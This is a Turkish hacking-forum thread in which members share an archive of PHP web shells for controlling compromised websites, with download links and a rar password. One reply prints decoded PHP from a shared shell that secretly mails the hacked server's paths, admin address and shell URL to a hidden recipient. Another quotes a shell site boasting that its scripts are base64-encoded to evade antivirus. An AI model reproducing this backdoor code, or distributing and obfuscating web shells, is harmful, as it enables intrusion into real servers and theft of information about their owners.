Shell Arşivi #ByDoldis

ByDoldis

Uzman üye
16 Ağu 2012
1,147
2
/dold.htm
Ardaşlar bana sürekli kullandığım sheller ile ilgili mesajlar geliyordu,hangi shelleri kullanıyorsun gibi şeyler, bende kullandığım shellerin sizde olan shellerden faklı olmadığını söylemekten bıktım usandım.İnanın kullandığım sadece 1 -2 shell var onlarıda size sunuyorum.

Buyrun size shell arşivim.

Tıkla Mutlu Sonu İndir

Rar Pass: ByDoldis

Not:İnjector shelde log vardır [email protected] yazan yeri kendinize göre düzenlersiniz.Diğer shellerde log yoktur en azından ben oyle biliyorum ;)

Son düzenleme:

K1L1T

Katılımcı Üye
12 Nis 2014
296
0
./root
Arkadaşlar Virtual PHP(wpmass) DE LOG VARDIR DİKKATLİ OLUNUZ

<?php
$kime="[email protected]";
$baslik="Sadrazam Casus Shell";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['********_ROOT']."\r\n";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);
?

Base64 tarafımca decode edilmiştir.

Son düzenleme:

K1L1T

Katılımcı Üye
12 Nis 2014
296
0
./root
Bu shell de zaten log var arkadasim bunu herkes biliyor ama bildikleri halde yinede kullaniyorlar :RpS_rolleyes:

Bu shellin gercek ismi angel shelldir. Onun icin orginalini kullanmakta fayda vardir :RpS_thumbup:

http://www.r57shell.org/shell/angel.txt
http://www.r57shell.org/shell/angel.rar

Sitelerinde böyle bir yazi var; +1

DIKKAT: Sunucuda / PCde, antivirüslerin tanidigi shelleri base64 ile sifreledik, scriptleri encode ederek antivirüslerin yakalamalarini engelledik.
Hic bir shellimiz loglu degildir. Bunun ispatida scriptleri Base64 Decode and Encode - Online adresinden tek tek decode edip kontrol edebilirsiniz.
Scriptleri bilgisayariniza Strg+5 .php olarak kayit edip sonrada sorunsuz bir sekilde sunucuya upload yapabilirsiniz.
Bu scriptler sadece egitim amaclidir.

Neyin Kafasındasın ben wpmass için konuşuyorum sen diyosun angel shell ben onu kastetmiyorum bile

STR-Key

Kıdemli Üye
5 Ocak 2012
3,246
48
K1L1T Nedense Benim Konularada Cok Dikkatsiz Msjlar Atıyorsun Napmak İstedigini Anlamadım ByDoldis
i tanıyan tanıyor

STR-Key

Kıdemli Üye
5 Ocak 2012
3,246
48
Anladım Kardeşim Aranızdaki Samimiyet İ Bilemem Ama Birazdaha Dikkatli Olursan İyi Olur. Teşekkirler

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.